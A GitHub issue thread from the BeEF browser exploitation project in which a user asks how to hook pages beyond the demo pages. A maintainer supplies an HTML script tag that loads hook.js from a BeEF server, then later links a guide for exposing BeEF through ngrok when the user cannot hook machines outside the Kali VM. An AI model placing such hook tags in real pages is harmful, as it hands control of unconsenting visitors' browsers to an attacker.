### ISSUE TITLE
how do you create a custom link?

### ISSUE THREAD

**Issue by 6861560** [beefproject/beef#2467]
i only know how to use the demo pages but how do you add a custom link thats not the demo pages?

**Comment by bcoles** [comment]
The BeEF hook is written in JavaScript. You can include it in any HTML page using `<script>` tags the same way you would any other JavaScript file.

```html
<script src="https://beef.local:3000/hook.js"></script>
```

**Comment by 6861560** [comment]
Ok. I tried using that command you sent. but it did not work when i tested it on my test website for my kali linux on my VB, and my host. Any Reason to why it did not work? I got it to work when i was just using only kali linux with the local command. but i want it to make it so that the script and be used on my host computer too.

**Comment by bcoles** [comment]
> Any Reason to why it did not work?

Where did you get stuck during troubleshooting?

**Comment by 6861560** [comment]
i only got stuck during troubleshooting when i tried using the any BeEF script on my host pc but it just doesn’t work.

**Comment by bcoles** [comment]
> i only got stuck during troubleshooting when i tried using the any BeEF script on my host pc but it just doesn’t work.

Where did you get stuck during troubleshooting?

**Comment by 6861560** [comment]
i got stuck troubleshooting when i cant be hooked on my host and i tried 10.2.15 or any other ip in kali bit it just doesn’t work for any other computer
than kali.

**Comment by bcoles** [comment]
Original question is answered. Discussion moved to #2475. Closing.

**Comment by DsChauhan08** [comment]
> i got stuck troubleshooting when i cant be hooked on my host and i tried 10.2.15 or any other ip in kali bit it just doesn’t work for any other computer than kali.

That's what happening with me! Any solutions?

**Comment by bcoles** [comment]
> > i got stuck troubleshooting when i cant be hooked on my host and i tried 10.2.15 or any other ip in kali bit it just doesn’t work for any other computer than kali.
> 
> That's what happening with me! Any solutions?

https://github.com/beefproject/beef/wiki/Using-BeEF-With-NGROK
